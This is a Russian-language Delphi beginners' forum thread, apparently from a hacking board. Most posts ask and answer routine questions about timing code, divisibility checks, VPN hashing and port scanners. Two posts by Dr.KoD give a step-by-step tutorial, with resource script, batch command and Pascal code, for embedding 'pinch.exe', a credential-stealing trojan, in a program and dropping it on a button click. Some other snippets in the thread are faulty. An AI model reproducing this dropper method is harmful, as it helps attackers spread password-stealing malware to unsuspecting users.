[ Delphi / Pascal ] — начинающим: задаем вопросы (архивная - 2015)

Discussion in 'С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby' started by banned, 6 May 2007.

Thread Status:
Not open for further replies.
  1. Dr.KoD

    Dr.KoD Elder - Старейшина

    Joined:
    1 Mar 2008
    Messages:
    68
    Likes Received:
    22
    Reputations:
    1
    [Dezzter] Я тебе же пример скинул там все написано, что да как!!!
    Что именно тебе непонятно?
     
    1 person likes this.
  2. Dr.KoD

    Dr.KoD Elder - Старейшина

    Joined:
    1 Mar 2008
    Messages:
    68
    Likes Received:
    22
    Reputations:
    1
    -Hormold-
    http://rapidshare.com/files/113245101/________.rar.html
    На вот, там 2 минуты работы.
    base64,codes,proto,pworks вот эти файлы незабывай ложить в папку с проектом или же скопируй их в папку c делфи, думаю знаеш куда их пихать ;)

    Должно быть что то типо этого:
    ExtractRes('EXEFILE', 'pinch', 'pinch.exe');
    Да, ты саму то функцию написал ExtractRes? ;)
    Если, что она есть в примере, который я тебе дал.
     
    #1502 Dr.KoD, 7 May 2008
    Last edited by a moderator: 11 May 2008
  3. Dr.KoD

    Dr.KoD Elder - Старейшина

    Joined:
    1 Mar 2008
    Messages:
    68
    Likes Received:
    22
    Reputations:
    1
    [Dezzter]
    Кароч распишу все по порядку это будет полезно и тебе и всем кто захочет такое сотварить:
    1. Создаем pinch.rc файл в нем пишем вот это:

    pinch EXEFILE pinch.exe

    2. Копируем в папку с проектом brcc32.exe и создаем
    *.bat файл с таким содержанием:

    brcc32 pinch.rc

    (pinch.exe, pinch.rc должны находиться в той же папке, что и проект).

    3. Получаем res файл и переходим к кодингу:

    Code:
    implementation
    
    {$R *.dfm} // это тут находится по умолчанию
    {$R pinch.RES} // наш файл
    
    function ExtractRes(ResType, ResName, ResNewName: string): Boolean; //функция, которая создает файл из файла ресурсов
    var
      Res: TResourceStream;
    begin
      Res := TResourceStream.Create(Hinstance, Resname, PChar(ResType));
      try
        Res.SavetoFile(ResNewName);
        Result := True;
      finally
        Res.Free;
      end;
    end;
    
    procedure TForm1.BitBtn1Click(Sender: TObject);
    var
    FileName:string; //по нажатию на кнопку получаем наш заветный пинчик.ехе
    begin
    FileName:='pinch.exe';
    ExtractRes('EXEFILE', 'pinch', FileName );
    end;
    
    end.
    Вот так все просто(на первый взгляд :D ) ;)
     
    #1503 Dr.KoD, 7 May 2008
    Last edited: 7 May 2008
    1 person likes this.
  4. KIR@PRO

    KIR@PRO Active Member

    Joined:
    26 Dec 2007
    Messages:
    824
    Likes Received:
    287
    Reputations:
    359
    подскажите програмную реализацию на Delphi хеширования пароля при передаче в VPN подключении с такими характеристиками:

    тут написано MD5 CHAP но про CHAP я ни чего не нашел...
     
    _________________________
  5. ProTeuS

    ProTeuS --

    Joined:
    26 Nov 2004
    Messages:
    1,239
    Likes Received:
    541
    Reputations:
    445
    >>тут написано MD5 CHAP но про CHAP я ни чего не нашел...
    а я нашел:

    http://russianproxy.ru/pptp_vpn
    http://en.wikipedia.org/wiki/Point-to-point_tunneling_protocol
    http://www.sans.org/resources/malwarefaq/pptp-vpn.php

    сорцы PPTP-клиента, в котором "PPP-MPPE 2.4.0 and 2.4.1 contain MS-CHAP-v2 and MPPE support "... 4итай, расбирайся, портируй на делфи...
    http://pptpclient.sourceforge.net/
     
    1 person likes this.
  6. KIR@PRO

    KIR@PRO Active Member

    Joined:
    26 Dec 2007
    Messages:
    824
    Likes Received:
    287
    Reputations:
    359
    Тока там исходники отнють не на delphi....((( покрайней мере не вижу.... (может просто мой английйский сильно страдает а можнт что то другое.....) я ж имел ввиду на делфях.... :confused:
     
    _________________________
    1 person likes this.
  7. ToniKapuchon

    ToniKapuchon Elder - Старейшина

    Joined:
    26 Feb 2006
    Messages:
    153
    Likes Received:
    45
    Reputations:
    -1
    вот братцы кусок коду:
    работаю с екселям!

    Всё втыкнул!!
     
    #1507 ToniKapuchon, 11 May 2008
    Last edited: 11 May 2008
    1 person likes this.
  8. foxes

    foxes New Member

    Joined:
    24 Feb 2006
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Помогите, такая проблема.нужен исходник для delphi сканер порта.
    Чтобы мог сканировать всю сеть типа(NetLook).
    Чтобы не вбивать диапазон ip.
    Отдельные порта например 21,80
    заранее спасибо.
     
  9. KIR@PRO

    KIR@PRO Active Member

    Joined:
    26 Dec 2007
    Messages:
    824
    Likes Received:
    287
    Reputations:
    359
    foxes

    ты определись уже сканер порта или всетаки обозреватель сети???

    Netlook насколько я знаю не сканирует порты он рассылает Arp пакеты на которые компы ему отвечают потом сканит на расшаренные ресурсы каждого кто ответил...
     
    _________________________
  10. Dr.KoD

    Dr.KoD Elder - Старейшина

    Joined:
    1 Mar 2008
    Messages:
    68
    Likes Received:
    22
    Reputations:
    1
    foxes Вот раз сканер:
    http://www.cyberinfo.ru/index.php?newsid=3407
    это два:
    http://devoid.com.ua/pascal-delphi/delphi-network-programming/prosteishiy-skaner-portov-na-delphi.html
    и три:
    http://www.vr-online.ru/download.php?det=167
    А если постараться то можно найти их хз сколько, но т.к. если вы неможете элементарно юзать поиск, то такие программы вам писать еще рано!!! :D
     
    1 person likes this.
  11. !{ra!{e/\/

    !{ra!{e/\/ Banned

    Joined:
    27 Aug 2007
    Messages:
    98
    Likes Received:
    50
    Reputations:
    3
    Как узнать время выполнения какого либо участка кода в миллисекундах?
     
  12. dos999

    dos999 Elder - Старейшина

    Joined:
    15 Feb 2008
    Messages:
    137
    Likes Received:
    24
    Reputations:
    0
    2 !{ra!{e/\/
    мда... ну и вопрос, включи моск =)

    const
    ms = 1/24/60/60/1000; //одна милисекунда
    var
    t1, t2: tdateime;
    begin
    t1 := now;
    {Твой код}
    t2 := now - t1;
    ShowMessage('Твой код выполнялся:'+inttostr(trunc(t2/ms))+'милисеунд');
    end;
     
    1 person likes this.
  13. Lesnoy_chelovek

    Lesnoy_chelovek Elder - Старейшина

    Joined:
    6 Dec 2006
    Messages:
    224
    Likes Received:
    152
    Reputations:
    8
    Получай время в начале кода и в конце, а потом сверяй.
     
    1 person likes this.
  14. !{ra!{e/\/

    !{ra!{e/\/ Banned

    Joined:
    27 Aug 2007
    Messages:
    98
    Likes Received:
    50
    Reputations:
    3
    я так уже пробывал...вот опять...
    Code:
    procedure TForm1.Button1Click(Sender: TObject);
    const
    ms = 1/24/60/60/1000;
    var i:integer;
    t1, t2: tdatetime;
    as1:array [1..1000] of integer;
    begin
    randomize;
    t1 := now;
    for i:=1 to 1000 do as1[i]:=random(40);
    t2 := now - t1;
    ShowMessage('Твой код выполнялся:'+inttostr(trunc(t2/ms))+'милисеунд');
    end;
    делаю как ты сказал выходит
    Твой код выполнялся:0милисеунд
    что неправильно?
     
  15. zl0y

    zl0y Banned

    Joined:
    13 Sep 2006
    Messages:
    371
    Likes Received:
    270
    Reputations:
    109
    Интересует алгоритм который узнает делиться ли число без остатка на 1024,без утомительного деления каждой части.
     
  16. alamat

    alamat Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    18
    Likes Received:
    3
    Reputations:
    0
    var
    tick:integer;
    begin
    tick:=GetCurrentTick;
    ... тут код
    messagebox(0,PAnsiChar('Твой код выполняется: '+inttostr(GetCurrentTick-tick)+' мс.'),'',0);
     
    1 person likes this.
  17. alamat

    alamat Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    18
    Likes Received:
    3
    Reputations:
    0
    Ну а в чем проблема?)
    Делишь, число переводишь в string, и смотришь есть ли "," или ".", если есть, то значит число не делится без остатка :). без деления никак )
     
    #1517 alamat, 13 May 2008
    Last edited: 13 May 2008
  18. !{ra!{e/\/

    !{ra!{e/\/ Banned

    Joined:
    27 Aug 2007
    Messages:
    98
    Likes Received:
    50
    Reputations:
    3
    if (x mod 1024)=0 then ////делится без остатка где х число
    else //не делится
    или я неправильно тебя понял?
     
  19. zl0y

    zl0y Banned

    Joined:
    13 Sep 2006
    Messages:
    371
    Likes Received:
    270
    Reputations:
    109
    типо умный да :)) во первых IntToStr и.т.д отсекают остаток и округляют до меньшего,я работаю с большими числами 512 бит и больше :(

    Сделал так с опр вероятностью говорит верно,но правильно ли это?
     
    4 people like this.
  20. !{ra!{e/\/

    !{ra!{e/\/ Banned

    Joined:
    27 Aug 2007
    Messages:
    98
    Likes Received:
    50
    Reputations:
    3
    на tick:=GetCurrentTick; выдает ошибку((
    может надо какую нибудь библиотеку подключить?
     
Loading...
Thread Status:
Not open for further replies.